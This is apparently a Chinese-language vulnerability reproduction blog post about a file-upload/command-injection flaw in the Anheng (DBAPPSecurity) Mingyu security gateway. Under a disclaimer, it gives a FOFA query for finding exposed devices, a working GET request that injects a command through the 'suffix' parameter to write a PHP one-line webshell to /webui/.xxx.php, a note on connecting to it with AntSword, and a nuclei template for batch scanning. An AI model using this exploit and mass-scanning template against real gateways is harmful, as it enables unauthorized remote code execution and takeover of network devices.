漏洞复现--安恒明御安全网关文件上传

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负

一:漏洞描述

安恒明御安全网关是一个网络安全产品,由安恒信息技术股份有限公司开发和提供。它是一个综合性的安全管理平台,用于保护企业网络免受各种网络威胁的攻击。该产品存在文件上传漏洞。

二:漏洞影响版本

安恒明御网关

三:网络空间测绘查询

fofa:
title=="明御安全网关"
漏洞复现--安恒明御安全网关文件上传_第1张图片

四:漏洞复现

POC:
GET /webui/?$type=1&bkg_flag=0&g=aaa_portal_auth_local_submit&suffix=1|echo+%22%3C%3fphp+eval(\$_POST[\%22cmd\%22])?%3E%22+%3E+.xxx.php HTTP/1.1
漏洞复现--安恒明御安全网关文件上传_第2张图片

漏洞复现--安恒明御安全网关文件上传_第3张图片
如此页面便存在该漏洞。该POC已将一句话木马写入,名称为.xxx.php,路径在/webui/.xxx.php
蚁剑连接:
漏洞复现--安恒明御安全网关文件上传_第4张图片

五:批量验证

nuclei:

id: mingyu_upload
info:
  name: mingyu_upload
  author: joyboy
  severity: critical
  description: http://xxx.xxx.xxx/webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+"<%3fphp+eval(\$_POST[\"a\"]);?>"+>+.xxx.php
  metadata:
    max-request: 1
    fofa-query: title="明御安全网关"
    verified: true
    CVE: 
  tags: 明御安全网关,uploadfile

requests:
  - raw:
      - |
        GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+"<%3fphp+eval(\$_POST[\"a\"]);?>"+>+.xxx.php HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: word
        part: body
        words:
          - 'success'

脚本来自揽月安全团队
漏洞复现--安恒明御安全网关文件上传_第5张图片

你可能感兴趣的:(漏洞复现,安全,web安全,网络安全)